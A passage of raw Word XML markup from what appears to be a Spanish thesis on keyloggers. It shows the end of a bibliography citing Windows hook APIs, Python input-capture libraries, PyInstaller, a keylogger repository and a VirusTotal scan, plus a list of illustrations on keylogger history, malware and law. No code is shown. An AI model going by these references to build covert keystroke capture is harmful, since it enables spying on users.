                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[83] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>M. W. D. Center, «Documentación function SetWindowsHookExA,» [En línea]. Available: https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[84] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>G. Martí, «tinykeylogger01.py,» 17 08 2019. [En línea]. Available: https://github.com/gabimarti/Demons-eye-keylogger/blob/master/test/tinykeylogger01.py.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[85] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«pynput Package Documentation,» [En línea]. Available: https://pynput.readthedocs.io/en/latest/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[86] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>G. Martí, «tinykeylogger02.py,» 17 08 2019. [En línea]. Available: https://github.com/gabimarti/Demons-eye-keylogger/blob/master/test/tinykeylogger02.py.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[87] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>T. Golden, «Module pythoncom documentation,» [En línea]. Available: http://timgolden.me.uk/pywin32-docs/pythoncom.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[88] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«pyWinHook. A pyHook module fork from Peter P. with some updates.,» [En línea]. Available: https://pypi.org/project/pyWinhook/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[89] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«winreg — Windows registry access,» [En línea]. Available: https://docs.python.org/3.7/library/winreg.html?highlight=winreg#module-winreg.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[90] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Module win32console,» [En línea]. Available: http://timgolden.me.uk/pywin32-docs/win32console.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[91] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«PyInstaller,» [En línea]. Available: https://www.pyinstaller.org/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[92] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Virus Total. Analisis demonseye.exe,» [En línea]. Available: https://www.virustotal.com/gui/file/864d22a771878bca313b85ef30a73d2e1911478abc0b85b65dc38f90d4e9ed23/detection.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[93] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Python ctypes — A foreign function library for Python,» [En línea]. Available: https://docs.python.org/3/library/ctypes.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[94] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Google, «Google Trends: keylogger,» [En línea]. Available: https://trends.google.es/trends/explore?date=all&amp;q=keylogger.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
              <w:pPr>
                <w:divId w:val="1125270685"/>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B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00231F20" w:rsidP="00550235">
      <w:pPr>
        <w:pStyle w:val="Titulo1NONUMERADO"/>
      </w:pPr>
      <w:bookmarkStart w:id="333" w:name="_Toc421702495"/>
      <w:bookmarkStart w:id="334" w:name="__RefHeading___Toc1116_228935268"/>
      <w:bookmarkStart w:id="335" w:name="_Toc18453552"/>
      <w:bookmarkStart w:id="336" w:name="_Toc19810118"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Índice de </w:t>
      </w:r>
      <w:bookmarkEnd w:id="332"/>
      <w:bookmarkEnd w:id="331"/>
      <w:bookmarkEnd w:id="330"/>
      <w:bookmarkEnd w:id="329"/>
      <w:bookmarkEnd w:id="333"/>
      <w:r w:rsidR="00537D63">
        <w:t>Ilustraciones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="334"/>
      <w:bookmarkEnd w:id="335"/>
      <w:bookmarkEnd w:id="336"/>
    </w:p>
    <w:p w:rsidR="00DF019A"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9358140" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 1. Dos modelos de keylogger hardware. Para teclado ps/2 y USB.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358140 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 2. IBM Selectric II (1971-1981)</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358141 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 3. Portada del documento de la NSA, “The GUNMAN Project”. Desclasificado en Diciembre de 2011</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358142 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 4. Bola “pelota de golf” de la IBM Selectric, con los caracteres.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358143 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 5. Muestra de una sección del perfil de LinkedIn de Michael Haephrati.  Detenido en 2005 por la creación de un keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358144 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 6. Función de keylogger del malware Carbanak.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358145 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 7. Código del keylogger inyectado después de su descifrado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358146 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 8. Diario Oficial de la Unión Europea.  DIRECTIVA 2013/40/UE. 12 agosto 2013.  Extracto del contenido relativo a los ataques contra los sistemas de información.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358147 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 9. Ejemplo de aviso legal sobre el uso del Keylogger, de un vendedor internacional.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358148 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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49" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 10. Extracto del Artículo 20 del Estatuto de los Trabajadores.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358149 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 11. Extracto del artículo 197 ter, de la Ley Orgánica 1/2015, de 30 de marzo</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358150 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>1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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 12. Esquema de circuito de keylogger básico usando la antigua conexión PS/2.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358151 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t xml:space="preserve">Ilustración 13. Esquema de funcionamiento del mecanismo de </w:t>
        </w:r>
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:i/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>hooks</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> en Windows.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358152 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
